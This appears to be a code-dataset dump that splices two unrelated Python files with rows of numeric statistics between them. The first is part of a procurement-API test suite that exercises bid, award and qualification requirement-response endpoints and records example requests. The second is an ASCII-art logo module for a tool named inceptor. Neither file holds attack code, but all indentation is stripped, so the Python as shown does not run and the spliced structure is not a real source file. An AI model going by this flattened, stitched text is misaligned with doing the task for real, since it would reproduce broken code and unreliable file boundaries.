'/tenders/{}/bids/{}/requirement_responses/{}/evidences?acc_token={}'.format(
self.tender_id, bid_id, rr_id, bid_token),
{'data': evidence_data},
)
self.assertEqual(response.status, '201 Created')
evidence_id = response.json["data"]["id"]
with open(TARGET_DIR + 'criteria/update-requirement-response-evidence.http', 'wb') as self.app.file_obj:
response = self.app.patch_json(
'/tenders/{}/bids/{}/requirement_responses/{}/evidences/{}?acc_token={}'.format(
self.tender_id, bid_id, rr_id, evidence_id, bid_token),
{'data': {'title': 'Update evidence title'}},
)
self.assertEqual(response.status, '200 OK')
self.set_status("active.auction")
with open(TARGET_DIR + 'criteria/requirement-response-list.http', 'wb') as self.app.file_obj:
response = self.app.get(
'/tenders/{}/bids/{}/requirement_responses'.format(self.tender_id, bid_id))
self.assertEqual(response.status, '200 OK')
with open(TARGET_DIR + 'criteria/requirement-response.http', 'wb') as self.app.file_obj:
response = self.app.get(
'/tenders/{}/bids/{}/requirement_responses/{}'.format(self.tender_id, bid_id, rr_id))
self.assertEqual(response.status, '200 OK')
with open(TARGET_DIR + 'criteria/requirement-response-evidence-list.http', 'wb') as self.app.file_obj:
response = self.app.get(
'/tenders/{}/bids/{}/requirement_responses/{}/evidences'.format(self.tender_id, bid_id, rr_id))
self.assertEqual(response.status, '200 OK')
with open(TARGET_DIR + 'criteria/requirement-response-evidence.http', 'wb') as self.app.file_obj:
response = self.app.get(
'/tenders/{}/bids/{}/requirement_responses/{}/evidences/{}'.format(
self.tender_id, bid_id, rr_id, evidence_id))
self.assertEqual(response.status, '200 OK')
self.set_status("draft")
with open(TARGET_DIR + 'criteria/delete-requirement-response-evidence.http', 'wb') as self.app.file_obj:
response = self.app.delete(
'/tenders/{}/bids/{}/requirement_responses/{}/evidences/{}?acc_token={}'.format(
self.tender_id, bid_id, rr_id, evidence_id, bid_token))
self.assertEqual(response.status, '200 OK')
with open(TARGET_DIR + 'criteria/delete-requirement-response.http', 'wb') as self.app.file_obj:
response = self.app.get(
'/tenders/{}/bids/{}/requirement_responses/{}?acc_token={}'.format(
self.tender_id, bid_id, rr_id, bid_token))
self.assertEqual(response.status, '200 OK')
def test_award_requirement_response(self):
self.app.authorization = ('Basic', ('broker', ''))
response = self.app.post_json(
'/tenders?opt_pretty=1',
{'data': test_tender_data})
self.assertEqual(response.status, '201 Created')
tender = response.json['data']
owner_token = response.json['access']['token']
self.tender_id = tender['id']
self.set_status("active.tendering")
criteria_data = deepcopy(test_criteria[6:8])
response = self.app.post_json(
'/tenders/{}/criteria?acc_token={}'.format(self.tender_id, owner_token),
{'data': criteria_data},
)
self.assertEqual(response.status, '201 Created')
criteria = response.json["data"]
bid_data = deepcopy(bid)
bid_data["status"] = "draft"
response = self.app.post_json(
'/tenders/{}/bids'.format(self.tender_id),
{'data': bid})
bid_id = response.json['data']['id']
bid_token = response.json['access']['token']
response = self.app.patch_json(
'/tenders/{}/bids/{}?acc_token={}'.format(
self.tender_id, bid_id, bid_token),
{'data': {"status": "pending"}})
# create second bid
self.create_bid(self.tender_id, bid2)
# Pre-qualification
self.set_status(
'active.pre-qualification',
{"id": self.tender_id, 'status': 'active.tendering'})
self.check_chronograph()
response = self.app.get('/tenders/{}/qualifications'.format(self.tender_id))
self.assertEqual(response.status, "200 OK")
qualifications = response.json['data']
for qualification in qualifications:
response = self.app.patch_json(
'/tenders/{}/qualifications/{}?acc_token={}'.format(
self.tender_id, qualification['id'], owner_token),
{"data": {
"status": "active",
"qualified": True,
"eligible": True
}})
self.assertEqual(response.status, "200 OK")
# active.pre-qualification.stand-still
response = self.app.patch_json(
'/tenders/{}?acc_token={}'.format(self.tender_id, owner_token),
{"data": {"status": "active.pre-qualification.stand-still"}})
self.assertEqual(response.status, "200 OK")
self.assertEqual(response.json['data']['status'], "active.pre-qualification.stand-still")
# switch to active.auction
self.set_status('active.auction')
self.app.authorization = ('Basic', ('auction', ''))
response = self.app.get('/tenders/{}/auction'.format(self.tender_id))
auction_bids_data = response.json['data']['bids']
for b in auction_bids_data:
b.pop("status", None)
self.app.post_json(
'/tenders/{}/auction'.format(self.tender_id),
{'data': {'bids': auction_bids_data}})
self.app.authorization = ('Basic', ('broker', ''))
response = self.app.get('/tenders/{}/awards?acc_token={}'.format(self.tender_id, owner_token))
# get pending award
award_id = [i['id'] for i in response.json['data'] if i['status'] == 'pending'][0]
self.set_status("active.qualification")
response = self.app.post_json(
"/tenders/{}/awards/{}/documents?acc_token={}".format(
self.tender_id, award_id, owner_token),
{"data": {
"title": "name.doc",
"url": self.generate_docservice_url(),
"hash": "md5:" + "0" * 32,
"format": "application/msword",
}}
)
self.assertEqual(response.status, "201 Created")
doc_id = response.json["data"]["id"]
# response = self.app.patch_json(
# '/tenders/{}/awards/{}?acc_token={}'.format(self.tender_id, award_id, owner_token),
# {"data": {
# "status": "active",
# "qualified": True,
# "eligible": True
# }})
# self.assertEqual(response.status, '200 OK')
evidence_data = {
"title": "Requirement response",
"relatedDocument": {
"id": doc_id,
"title": "name.doc",
},
"type": "document",
}
requirement_1 = criteria[0]["requirementGroups"][0]["requirements"][0]
requirement_2 = criteria[1]["requirementGroups"][0]["requirements"][0]
rr_mock = {
"title": "Requirement response",
"description": "some description",
"requirement": {
"id": requirement_1["id"],
"title": requirement_1["title"],
},
"evidences": [
evidence_data,
],
"value": "True",
}
rr_1 = deepcopy(rr_mock)
rr_2 = deepcopy(rr_mock)
rr_2["title"] = "Requirement response 2"
rr_2["requirement"] = {
"id": requirement_2["id"],
"title": requirement_2["title"],
}
self.tick()
with open(TARGET_DIR + 'criteria/add-requirement-response-from-award.http', 'wb') as self.app.file_obj:
response = self.app.patch_json(
'/tenders/{}/awards/{}?acc_token={}'.format(
self.tender_id, award_id, owner_token),
{'data': {'requirementResponses': [rr_1, rr_2]}},
)
self.assertEqual(response.status, '200 OK')
rr_1["title"] = "Requirement response 1"
with open(TARGET_DIR + 'criteria/patch-requirement-response-from-award.http', 'wb') as self.app.file_obj:
response = self.app.patch_json(
'/tenders/{}/awards/{}?acc_token={}'.format(
self.tender_id, award_id, owner_token),
{'data': {'requirementResponses': [rr_1, rr_2]}},
)
self.assertEqual(response.status, '200 OK')
tender = self.db.get(self.tender_id)
for a in tender["awards"]:
if a["id"] == award_id:
del a["requirementResponses"]
self.db.save(tender)
test_rr_data = [deepcopy(rr_mock), ]
with open(TARGET_DIR + 'criteria/award-create-requirement-response.http', 'wb') as self.app.file_obj:
response = self.app.post_json(
'/tenders/{}/awards/{}/requirement_responses?acc_token={}'.format(
self.tender_id, award_id, owner_token),
{'data': test_rr_data},
)
self.assertEqual(response.status, '201 Created')
rr_id = response.json["data"][0]["id"]
with open(TARGET_DIR + 'criteria/award-update-requirement-response.http', 'wb') as self.app.file_obj:
response = self.app.patch_json(
'/tenders/{}/awards/{}/requirement_responses/{}?acc_token={}'.format(
self.tender_id, award_id, rr_id, owner_token),
{'data': {'title': 'Updated title'}},
)
self.assertEqual(response.status, '200 OK')
with open(TARGET_DIR + 'criteria/award-create-requirement-response-evidence.http', 'wb') as self.app.file_obj:
response = self.app.post_json(
'/tenders/{}/awards/{}/requirement_responses/{}/evidences?acc_token={}'.format(
self.tender_id, award_id, rr_id, owner_token),
{'data': evidence_data},
)
self.assertEqual(response.status, '201 Created')
evidence_id = response.json["data"]["id"]
with open(TARGET_DIR + 'criteria/award-update-requirement-response-evidence.http', 'wb') as self.app.file_obj:
response = self.app.patch_json(
'/tenders/{}/awards/{}/requirement_responses/{}/evidences/{}?acc_token={}'.format(
self.tender_id, award_id, rr_id, evidence_id, owner_token),
{'data': {'title': 'Update evidence title'}},
)
self.assertEqual(response.status, '200 OK')
with open(TARGET_DIR + 'criteria/award-requirement-response-list.http', 'wb') as self.app.file_obj:
response = self.app.get(
'/tenders/{}/awards/{}/requirement_responses'.format(self.tender_id, award_id))
self.assertEqual(response.status, '200 OK')
with open(TARGET_DIR + 'criteria/award-requirement-response.http', 'wb') as self.app.file_obj:
response = self.app.get(
'/tenders/{}/awards/{}/requirement_responses/{}'.format(self.tender_id, award_id, rr_id))
self.assertEqual(response.status, '200 OK')
with open(TARGET_DIR + 'criteria/award-requirement-response-evidence-list.http', 'wb') as self.app.file_obj:
response = self.app.get(
'/tenders/{}/awards/{}/requirement_responses/{}/evidences'.format(self.tender_id, award_id, rr_id))
self.assertEqual(response.status, '200 OK')
with open(TARGET_DIR + 'criteria/award-requirement-response-evidence.http', 'wb') as self.app.file_obj:
response = self.app.get(
'/tenders/{}/awards/{}/requirement_responses/{}/evidences/{}'.format(
self.tender_id, award_id, rr_id, evidence_id))
self.assertEqual(response.status, '200 OK')
with open(TARGET_DIR + 'criteria/award-delete-requirement-response-evidence.http', 'wb') as self.app.file_obj:
response = self.app.delete(
'/tenders/{}/awards/{}/requirement_responses/{}/evidences/{}?acc_token={}'.format(
self.tender_id, award_id, rr_id, evidence_id, owner_token))
self.assertEqual(response.status, '200 OK')
with open(TARGET_DIR + 'criteria/award-delete-requirement-response.http', 'wb') as self.app.file_obj:
response = self.app.get(
'/tenders/{}/awards/{}/requirement_responses/{}?acc_token={}'.format(
self.tender_id, award_id, rr_id, owner_token))
self.assertEqual(response.status, '200 OK')
def test_qualification_requirement_response(self):
self.app.authorization = ('Basic', ('broker', ''))
response = self.app.post_json(
'/tenders?opt_pretty=1',
{'data': test_tender_data})
self.assertEqual(response.status, '201 Created')
tender = response.json['data']
owner_token = response.json['access']['token']
self.tender_id = tender['id']
self.set_status("active.tendering")
criteria_data = deepcopy(test_criteria[6:8])
response = self.app.post_json(
'/tenders/{}/criteria?acc_token={}'.format(self.tender_id, owner_token),
{'data': criteria_data},
)
self.assertEqual(response.status, '201 Created')
criteria = response.json["data"]
bid_data = deepcopy(bid)
bid_data["status"] = "draft"
response = self.app.post_json(
'/tenders/{}/bids'.format(self.tender_id),
{'data': bid})
bid_id = response.json['data']['id']
bid_token = response.json['access']['token']
response = self.app.patch_json(
'/tenders/{}/bids/{}?acc_token={}'.format(
self.tender_id, bid_id, bid_token),
{'data': {"status": "pending"}})
# create second bid
self.app.authorization = ('Basic', ('broker', ''))
self.create_bid(self.tender_id, bid2)
# Pre-qualification
self.set_status(
'active.pre-qualification',
{"id": self.tender_id, 'status': 'active.tendering'})
self.check_chronograph()
response = self.app.get('/tenders/{}/qualifications'.format(self.tender_id))
self.assertEqual(response.status, "200 OK")
qualifications = response.json['data']
qualification_id = qualifications[0]["id"]
response = self.app.post_json(
"/tenders/{}/qualifications/{}/documents?acc_token={}".format(
self.tender_id, qualification_id, owner_token),
{"data": {
"title": "name.doc",
"url": self.generate_docservice_url(),
"hash": "md5:" + "0" * 32,
"format": "application/msword",
}}
)
self.assertEqual(response.status, "201 Created")
doc_id = response.json["data"]["id"]
evidence_data = {
"title": "Requirement response",
"relatedDocument": {
"id": doc_id,
"title": "name.doc",
},
"type": "document",
}
requirement_1 = criteria[0]["requirementGroups"][0]["requirements"][0]
requirement_2 = criteria[1]["requirementGroups"][0]["requirements"][0]
rr_mock = {
"title": "Requirement response",
"description": "some description",
"requirement": {
"id": requirement_1["id"],
"title": requirement_1["title"],
},
"evidences": [
evidence_data,
],
"value": "True",
}
rr_1 = deepcopy(rr_mock)
rr_2 = deepcopy(rr_mock)
rr_2["title"] = "Requirement response 2"
rr_2["requirement"] = {
"id": requirement_2["id"],
"title": requirement_2["title"],
}
self.tick()
with open(TARGET_DIR + 'criteria/add-requirement-response-from-qualification.http', 'wb') as self.app.file_obj:
response = self.app.patch_json(
'/tenders/{}/qualifications/{}?acc_token={}'.format(
self.tender_id, qualification_id, owner_token),
{'data': {'requirementResponses': [rr_1, rr_2]}},
)
self.assertEqual(response.status, '200 OK')
rr_1["title"] = "Requirement response 1"
with open(TARGET_DIR + 'criteria/patch-requirement-response-from-qualification.http', 'wb') as self.app.file_obj:
response = self.app.patch_json(
'/tenders/{}/qualifications/{}?acc_token={}'.format(
self.tender_id, qualification_id, owner_token),
{'data': {'requirementResponses': [rr_1, rr_2]}},
)
self.assertEqual(response.status, '200 OK')
with open(TARGET_DIR + 'criteria/delete-requirement-response-from-qualification.http', 'wb') as self.app.file_obj:
response = self.app.patch_json(
'/tenders/{}/qualifications/{}?acc_token={}'.format(
self.tender_id, qualification_id, owner_token),
{'data': {'requirementResponses': []}},
)
self.assertEqual(response.status, '200 OK')
test_rr_data = [deepcopy(rr_mock), ]
with open(TARGET_DIR + 'criteria/qualification-create-requirement-response.http', 'wb') as self.app.file_obj:
response = self.app.post_json(
'/tenders/{}/qualifications/{}/requirement_responses?acc_token={}'.format(
self.tender_id, qualification_id, owner_token),
{'data': test_rr_data},
)
self.assertEqual(response.status, '201 Created')
rr_id = response.json["data"][0]["id"]
with open(TARGET_DIR + 'criteria/qualification-update-requirement-response.http', 'wb') as self.app.file_obj:
response = self.app.patch_json(
'/tenders/{}/qualifications/{}/requirement_responses/{}?acc_token={}'.format(
self.tender_id, qualification_id, rr_id, owner_token),
{'data': {'title': 'Updated title'}},
)
self.assertEqual(response.status, '200 OK')
with open(TARGET_DIR + 'criteria/qualification-create-requirement-response-evidence.http', 'wb') as self.app.file_obj:
response = self.app.post_json(
'/tenders/{}/qualifications/{}/requirement_responses/{}/evidences?acc_token={}'.format(
self.tender_id, qualification_id, rr_id, owner_token),
{'data': evidence_data},
)
self.assertEqual(response.status, '201 Created')
evidence_id = response.json["data"]["id"]
with open(TARGET_DIR + 'criteria/qualification-update-requirement-response-evidence.http', 'wb') as self.app.file_obj:
response = self.app.patch_json(
'/tenders/{}/qualifications/{}/requirement_responses/{}/evidences/{}?acc_token={}'.format(
self.tender_id, qualification_id, rr_id, evidence_id, owner_token),
{'data': {'title': 'Update evidence title'}},
)
self.assertEqual(response.status, '200 OK')
with open(TARGET_DIR + 'criteria/qualification-requirement-response-list.http', 'wb') as self.app.file_obj:
response = self.app.get(
'/tenders/{}/qualifications/{}/requirement_responses'.format(self.tender_id, qualification_id))
self.assertEqual(response.status, '200 OK')
with open(TARGET_DIR + 'criteria/qualification-requirement-response.http', 'wb') as self.app.file_obj:
response = self.app.get(
'/tenders/{}/qualifications/{}/requirement_responses/{}'.format(
self.tender_id, qualification_id, rr_id))
self.assertEqual(response.status, '200 OK')
with open(TARGET_DIR + 'criteria/qualification-requirement-response-evidence-list.http', 'wb') as self.app.file_obj:
response = self.app.get(
'/tenders/{}/qualifications/{}/requirement_responses/{}/evidences'.format(
self.tender_id, qualification_id, rr_id))
self.assertEqual(response.status, '200 OK')
with open(TARGET_DIR + 'criteria/qualification-requirement-response-evidence.http', 'wb') as self.app.file_obj:
response = self.app.get(
'/tenders/{}/qualifications/{}/requirement_responses/{}/evidences/{}'.format(
self.tender_id, qualification_id, rr_id, evidence_id))
self.assertEqual(response.status, '200 OK')
with open(TARGET_DIR + 'criteria/qualification-delete-requirement-response-evidence.http', 'wb') as self.app.file_obj:
response = self.app.delete(
'/tenders/{}/qualifications/{}/requirement_responses/{}/evidences/{}?acc_token={}'.format(
self.tender_id, qualification_id, rr_id, evidence_id, owner_token))
self.assertEqual(response.status, '200 OK')
with open(TARGET_DIR + 'criteria/qualification-delete-requirement-response.http', 'wb') as self.app.file_obj:
response = self.app.get(
'/tenders/{}/qualifications/{}/requirement_responses/{}?acc_token={}'.format(
self.tender_id, qualification_id, rr_id, owner_token))
self.assertEqual(response.status, '200 OK')
| 48.574962 | 134 | 0.545972 | 12,421 | 127,655 | 5.421464 | 0.024555 | 0.050104 | 0.047579 | 0.066825 | 0.959266 | 0.952614 | 0.94259 | 0.931838 | 0.919097 | 0.908524 | 0 | 0.016766 | 0.313634 | 127,655 | 2,627 | 135 | 48.593453 | 0.751798 | 0.015119 | 0 | 0.765213 | 0 | 0 | 0.257802 | 0.158995 | 0 | 0 | 0 | 0 | 0.104905 | 1 | 0.004541 | false | 0 | 0.004995 | 0 | 0.012716 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
0158e55cdf6dde396dd67b9bc95794079530ebe2 | 11,498 | py | Python | inceptor/utils/logo.py | whitefi/inceptor | 2234740b76c34b2ab91d05ff675748022c476a81 | [
"BSD-4-Clause"
] | 743 | 2021-08-02T16:27:27.000Z | 2022-03-31T16:34:16.000Z | inceptor/utils/logo.py | whitefi/inceptor | 2234740b76c34b2ab91d05ff675748022c476a81 | [
"BSD-4-Clause"
] | 32 | 2021-08-03T04:47:20.000Z | 2022-03-28T23:15:45.000Z | inceptor/utils/logo.py | whitefi/inceptor | 2234740b76c34b2ab91d05ff675748022c476a81 | [
"BSD-4-Clause"
] | 138 | 2021-08-02T16:27:28.000Z | 2022-03-31T02:47:20.000Z | from colorama import Fore
from config.Config import Config
W = Fore.LIGHTRED_EX
B = Fore.LIGHTBLUE_EX
LD = Fore.LIGHTBLACK_EX
D = Fore.BLACK
C = Fore.WHITE
white_screen_logo = rf"""
.......................................................................................
.%%%%
##%((.
,*(&(%
#*%%/#
.//&((,
.#*#&/#.
.//&#/%
#/(&(/%
.(//%&/(#
.*(/(%%(((
.,#((%&%((#.
..%##%%&%((#.
,%%%%%%&%##%
.(%%%#%%%&%%%&,
.(%%%/*/(##%%&%%( .
/..*%%%%#/,..,,,/%&&%%,..
*(#%##((///(#%%%%%%%%%#((/((#%%%&#,...
.,,**/((((#(#####%%%%%%%%%%%%%%####%%&%%%&%#/...,
%. ,,**/(###%%%%%%%%&%%%%%%%%%#(((##%%%%%%##(/,. ,,*
&&%%%%%%%%%%%%%%%%%%%%%%%%%#(/(((#%%%%##%(///,,,. ..,,*
(&&&%#////(%//#%%%%%%%###((((#%%%%####//(**/,... .* .,,
%&&&&&&&%#//(((%%%%(*,/(#%%%%%%%%%##(/(/,,..,. , . .
,&&&&&&&&&&&&&&&&&&&&&&&&%%%(/#////(((#%%&&&&&&&&
%&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&%/.
&&&&&&&&&&&&&&&&&&&&&&&/
&&&&&&&&&&&&&&&&&&&
&&&&&&&&&&&&&&&#
.......,,,,,/&&&&&&&&&&&&&*****,,,,,,......
......,,,,,,*************(&&&&&&&&&&**////////////////*****,,,,.....
......,,,,,,*******//////////*/*&&&&&&&//////////////////////////****,,,,,...
.....,,,,,,*****//////(((((((######%%%%%%%%#####((((((((((((((((////****,,,,......
.........,#(*,*****////((((((((((((((((#############%%#######((((///*****,,,,..........
........{W}%%{C}........................................{W}#%%{C}..................................
........{W}%%.,%%%%%%% .#%%%%% ,%%%%%. ,#%%%%. %%%%%%%%* ,%%%%%. %,.%%%%,{C}...........
........{W}%% #%% %% #%%. .#%% %% %% %% #%% #%% %% %%{C}.................
........{W}%% #%% %% #%% .#%%%%&&. %%%%%%. #%% %%, %% %%{C}.................
........{W}%% #%% %% #%%. ,%%. %% #%. # #%% ,%% %%{C}.................
........{W}%% #%% %% #%%%%% #%%%%* %% \%%%* *#%%% %%%{C}................
.......................................................................................
▒ {Fore.LIGHTCYAN_EX}by d3adc0de (@klezVirus){C}
---------------------------------------------------------------------------------------
"""
black_screen_logo = rf"""
{C}@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@&{D},{LD},,{D},{C}@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@{D}*{C}*{D},{LD}//{C}&@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@{LD}%{LD}#{C}/{D}.{LD}/{D},{C}@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@{LD}*{LD}#{C},{D},{LD}({D}*{C}@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@&{LD}({C}({D}.{LD}/{D}/{C}%@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@&{D}*{LD}#{C}*{D}.{C}({D}*{C}&@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@&{D}({C}({D}.*{C}({D},{C}@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@{D}*{LD}({C}/{D}.{LD}/{C}({D},{C}@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@&{D}/{LD}({C}({D},.{C}(/{D}*{C}@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@&#{D}/{LD}({C}/{D},,{C}//{D}/{C}@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@&%{D}*{LD}/{C}/{D},.,{C}//{D}*{C}&@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@&&{D},{C}*{LD}*{D},..,{LD}/{C}/{D}*{C}&@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@%{D},,,,,..,{LD}**{D},{C}@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@&/{D},,,{C}*{LD},,,{D}..,,.{C}%@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@&/{D},,,{C}(#({LD}/**{D},...,/{C}@&@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@(&&#{D},,,,{LD}*({C}%&&%%%{LD}(,{D}..,,{LD}%{C}&&@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@{LD}#{D}/*,**/{LD}/(((/*{D},,,,,,,,,{LD}*//{C}(//*{D},...{LD}*{C}%&{LD}&{C}&@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@&{LD}%%##(////{D}*/*****,,,,,,,,,,,,,,****,,.,.,.,{LD}*({C}&&&{LD}%{C}@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@{D},{LD}&{C}@%%##{LD}(/***{D},,,,,,,,.,,,,,,,,,{LD}*///**{D},,,,,,{LD}**/({C}%&@@{LD}%%#{C}@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@{LD}..,,{D},,,,,,,,,,,,,,,,,,,,{LD},,,*/(///*,{D},,,**,{LD}/((({LD}%%%{C}&@@&&{LD}%%#{C}@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@/{D}...,{LD}*{C}((((/,((*{D},,,,,,,{LD}***////*{D},,,,{LD}****((/{C}##(%&&&@@&{LD}#{C}@@&{LD}%%{C}@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@{D},.......{LD},*((///,,,,{C}/#%(/*{D},,,,,,,,,{LD}**/(/({C}%%&&%&@%@&@@{LD}&{C}@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@%{D}....................{LD}....,,,/(*{C}(((({LD}///*,,........{C}@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@{D},.....................................{LD},({C}&@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@{D}.......................({C}@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@{D}...................{C}@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@{D}...............{C}*@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@&&&&&&&%%%%%({D}.............{C}#####%%%%%%&&&&&&@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@&&&&&&%%%%%%#############/{D}..........{C}##((((((((((((((((#####%%%%&&&&&@@@@@@@@@@
@@@&&&&&&%%%%%%######(((((((((((((({D}.......{C}((((((((((((((((((((((((((####%%%%%&&&@@@@@@
@@&&&&&%%%%%%#####((((((///////{LD}******,,,,,,,,*****{C}////////////////((((####%%%%&&&&&&@@
&&&&&&&&&%{D}*/{C}#%####(((((////////////////{D}*************,,*******{C}////(((#####%%%%&&&&&&&&&
&&&&&&&&&&{D},,{C}%&&{LD}&{D}*,,{C}%%%%%%%########((((((((((((((((({D},,{C}/((######%%%%%%%%&&&&&&&&&&&&&&&&
&&&&&&&&&&{D},,{C}&{D}*,/{C}&&%{D}..{C}&&&{D}*,,*/({C}&&&&{D}......{C}&%{LD}**#{D},..{C}&&{D}(..,{LD}#({C}%&%%{D},,,{C}/(&{D},,,,,{LD}#({C}%&&&&&&&&&&&&
&&&&&&&&&&{D},,{C}&{D},,{C}%&&&{D}..{C}&{D}*..{C}&&&&&&#{D}..{C}%&&{D}**{C},,{D}*,{C}#&&%{D}..{C}&&{D}..{C}&&&&&{D}..({C}&&{D}&{C}%&{D},,{C}&&&&&&&&&&&&&&&&&&
&&&&&&&&&&{D}/{LD}({C}&{D},,{C}%&&&{D}**{C}&{D},.,{C}&&&&&&{D},,{C}&{LD}%{D}/{LD}#{C}&&&& &&&{D}/.,{C}&#{D}.,{C}&&&&&{D}..{C}&&&{LD}%{C}%&{D},,{C}&&&&&&&&&&&&&&&&&&
&&&&&&&&&&{LD}%{C}&&{D}/({C}&&&&{D}(({C}&&{D}//*({LD}&&{C}&&&{D}(/(&&{C}&&&&{D}..{LD}&#{D}(/{C}%&&&{D}**{C}&&&{D}%{C}&{D}..{C}%&{D}({C}%%&{D}(/{C}&&&&&&&&&&&&&&&&&&
&&&&&&&&&&&&&{LD}%%{C}&&&&{LD}%%{C}&&&&&&%%%&&&&&&%&&&&{D},*{C}%&&&&&&&&{LD}&{D}(%{C}&&&&&{D}#({C}&&&&{LD}%%{C}&&&&&&&&&&&&&&&&&&
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&{LD}##{C}&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&%%&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
▒ {Fore.LIGHTCYAN_EX}by d3adc0de (@klezVirus){C}
--------------------------------------------------------------------------------------
"""
simple_logo = rf"""
.......................................................................................
........{W}%%{C}........................................{W}#%%{C}..................................
........{W}%%.,%%%%%%% .#%%%%% ,%%%%%. ,#%%%%. %%%%%%%%* ,%%%%%. %,.%%%%,{C}...........
........{W}%% #%% %% #%%. .#%% %% %% %% #%% #%% %% %%{C}.................
........{W}%% #%% %% #%% .#%%%%&&. %%%%%%. #%% %%, %% %%{C}.................
........{W}%% #%% %% #%%. ,%%. %% #%. # #%% ,%% %%{C}.................
........{W}%% #%% %% #%%%%% #%%%%* %% \%%%* *#%%% %%%{C}................
.......................................................................................
▒ {Fore.LIGHTCYAN_EX}by d3adc0de (@klezVirus){C}
--------------------------------------------------------------------------------------
"""
def get_logo():
logo = Config().get_int("MISC", "LOGO")
if logo == 0:
return ""
elif logo == 1:
return simple_logo
elif logo == 2:
return white_screen_logo
elif logo == 3:
return black_screen_logo | 90.535433 | 165 | 0.07123 | 424 | 11,498 | 1.896226 | 0.084906 | 0.221393 | 0.235075 | 0.253731 | 0.645522 | 0.645522 | 0.643035 | 0.634328 | 0.590796 | 0.431592 | 0 | 0.001299 | 0.330318 | 11,498 | 127 | 166 | 90.535433 | 0.102727 | 0 | 0 | 0.214876 | 0 | 0.066116 | 0.957909 | 0.579007 | 0 | 0 | 0 | 0 | 0 | 1 | 0.008264 | false | 0 | 0.016529 | 0 | 0.057851 | 0 | 0 | 0 | 1 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
